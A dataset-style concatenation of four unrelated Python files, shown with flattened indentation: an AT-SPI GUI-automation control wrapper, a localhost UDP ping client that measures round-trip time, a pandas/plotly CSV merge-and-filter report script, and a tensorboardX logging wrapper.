for t in cls._control_types:
AtspiMeta.control_type_to_cls[t] = cls
@staticmethod
def find_wrapper(element):
"""Find the correct wrapper for this Atspi element"""
# Check for a more specific wrapper in the registry
try:
wrapper_match = AtspiMeta.control_type_to_cls[element.control_type]
except KeyError:
# Set a general wrapper by default
wrapper_match = AtspiWrapper
return wrapper_match
# =========================================================================
@six.add_metaclass(AtspiMeta)
class AtspiWrapper(BaseWrapper):
"""
Default wrapper for User Interface Automation (Atspi) controls.
All other Atspi wrappers are derived from this.
This class wraps a lot of functionality of underlying Atspi features
for working with windows.
Most of the methods apply to every single element type. For example
you can click() on any element.
"""
_control_types = []
# ------------------------------------------------------------
def __new__(cls, element_info):
"""Construct the control wrapper"""
return super(AtspiWrapper, cls)._create_wrapper(cls, element_info, AtspiWrapper)
# -----------------------------------------------------------
def __init__(self, element_info):
"""
Initialize the control
* **element_info** is either a valid AtspiElementInfo or it can be an
instance or subclass of AtspiWrapper.
If the handle is not valid then an InvalidWindowHandle error
is raised.
"""
BaseWrapper.__init__(self, element_info, backend.registry.backends['atspi'])
# ------------------------------------------------------------
def set_keyboard_focus(self):
"""Set the focus to this element"""
self.element_info.component.grab_focus("screen")
return self
# ------------------------------------------------------------
def set_window_focus(self, pid):
display = Display()
root = display.screen().root
def top_level_set_focus_by_pid(pid, window, indent):
children = window.query_tree().children
for w in children:
if window.get_wm_class() is not None:
if window.get_full_property(display.get_atom("_NET_WM_PID"), Xatom.CARDINAL).value[0] == pid:
window.raise_window()
top_level_set_focus_by_pid(pid, w, indent + '-')
top_level_set_focus_by_pid(pid, root, '-')
# ------------------------------------------------------------
def set_focus(self):
if self.parent() == self.root() or self.parent().parent() == self.root() and not self.is_visible():
# Try to find first child control of current window like button or text area and set focus to it.
# It should automatically set focus to window.
for child in self.descendants():
# TODO extend list of focusable elements
if child.element_info.control_type in ['PushButton', 'CheckBox', 'ToggleButton', 'RadioButton',
'Text']:
child.set_keyboard_focus()
break
if not self.is_visible():
# If unable to set window focus via ATSPI try to set focus via XLIB
self.set_window_focus(self.element_info.process_id)
else:
self.set_keyboard_focus()
return self
# ------------------------------------------------------------
def get_states(self):
return self.element_info.get_state_set()
# ------------------------------------------------------------
def get_menu(self):
self.verify_actionable()
menu = None
for child in self.descendants():
if child.element_info.control_type in ["MenuBar"]:
menu = child
return menu
# -----------------------------------------------------------
def is_active(self):
"""Whether the element is active or not"""
for i in self.state:
if i == 'STATE_ACTIVE':
return True
return False
# -----------------------------------------------------------
def get_slider(self):
self.verify_actionable()
slider = []
for child in self.descendants():
if child.element_info.control_type in ["ScrollBar"]:
slider.append(child)
return slider[0]
backend.register('atspi', AtspiElementInfo, AtspiWrapper)
backend.activate('atspi') # default for Linux
|
import socket
import time
UDP_IP = 'localhost'
UDP_PORT = 12000
MESSAGE = "PING"
# Set up the UDP client socket
clientSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP protocol
# Set timeout on socket blocking operations (e.g recvfrom())
clientSocket.settimeout(1)
i = 1
while (i <= 10):
# Time at which the message is sent to the server
initialTime = time.time()
# Send the message to the server
clientSocket.sendto((MESSAGE + ' ' + str(i)).encode('utf8'), (UDP_IP, UDP_PORT))
try:
# Receive the echoed message from the server
(data, address) = clientSocket.recvfrom(10)
# Calculate RTT time after receiving the echoed message
RTT = time.time() - initialTime
# Print the RTT result and the received message
print (str(RTT) + ' ' + data.decode('utf8'))
except socket.timeout:
# If not hear back from the server after 1 second, the request timed out
print ('Request Timeout')
# Increment the counter to the next request
i = i + 1
|
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import pytest
import params
from optparse import OptionParser
df_ec = pd.read_csv("t2_ec 20190619.csv")
df_registry = pd.read_csv("t2_registry 20190619.csv")
df_registry = df_registry[ df_registry.SVPERF == 'Y' ]
df_registry = df_registry[ df_registry.VISCODE != 'bl' ]
def draw_pie(df_ec, df_registry):
fig = go.Figure(go.Pie(
name = "",
labels = df_registry.VISCODE,
hovertemplate = "Viscode: <B>%{label}</B><br><B>Count: %{value} (%{percent}) </B>",
title = dict(text="Viscodes from Registry", font=dict(size=20), position="top left")
))
fig.show()
return
# Read CSV files
def csv_report():
df_ec = pd.read_csv("t2_ec 20190619.csv")
df_registry = pd.read_csv("t2_registry 20190619.csv")
return df_ec, df_registry
# Merge dataframes on RID and VISCODE
def merge_dataframes(df_ec, df_registry, rid='RID', viscode='VISCODE'):
df_merge = pd.merge(df_registry, df_ec, on = ['RID','VISCODE'], how='outer', indicator=True)
return df_merge
# Filter records
def filter_records(df, viscode, svdose, ecsdstxt):
df_filtered = df[ df.VISCODE == viscode ]
df_filtered = df_filtered[ df_filtered.SVDOSE == svdose ]
df_filtered = df_filtered[ df_filtered.ECSDSTXT != ecsdstxt ]
print(df_filtered)
return df_filtered
# Create CSV file
def create_csv_file(df, options):
df_csv = df[['ID_x','RID','USERID_x','VISCODE','SVDOSE','ECSDSTXT']]
print(df_csv)
csv = df_csv.to_csv(options.results, index=False, header=False)
print(csv)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option('', '--viscode', dest='viscode', default='w02', help='Viscode parameter')
parser.add_option('', '--rid', dest='rid', default='RID', help='Rid parameter')
parser.add_option('', '--svdose', dest='svdose', default='Y', help='Svdose parameter')
parser.add_option('', '--ecsdstxt', dest='ecsdstxt', default='180', help='Ecsdstxt parameter')
parser.add_option('', '--results', dest='results', default='results.csv', help='results directory parameter')
options = parser.parse_args()[0]
draw_pie(df_ec, df_registry)
df_merge = merge_dataframes(df_ec, df_registry, options.rid, options.viscode)
df_filtered = filter_records(df_merge, options.viscode, options.svdose, options.ecsdstxt)
create_csv_file(df_filtered, options)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2019-01-25 17:16:34
# @Author : Raymond Wong (jiabo.huang@qmul.ac.uk)
# @Link : github.com/Raymond-sci
from tensorboardX import SummaryWriter as TFBWriter
from ..config import CONFIG as cfg
class TFLogger():
@staticmethod
def require_args():
cfg.add_argument('--log-tfb', action='store_true',
help='use tensorboard to log training process. '
'(default: False)')
def __init__(self, debugging, *args, **kwargs):
self.debugging = debugging
if not self.debugging and cfg.log_tfb:
self.writer = TFBWriter(*args, **kwargs)
def __getattr__(self,attr):
if self.debugging or not cfg.log_tfb:
return do_nothing
return self.writer.__getattribute__(attr)
def do_nothing(*args, **kwargs):
pass
from ..register import REGISTER
REGISTER.set_class(REGISTER.get_package_name(__name__), 'tf_logger', TFLogger)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.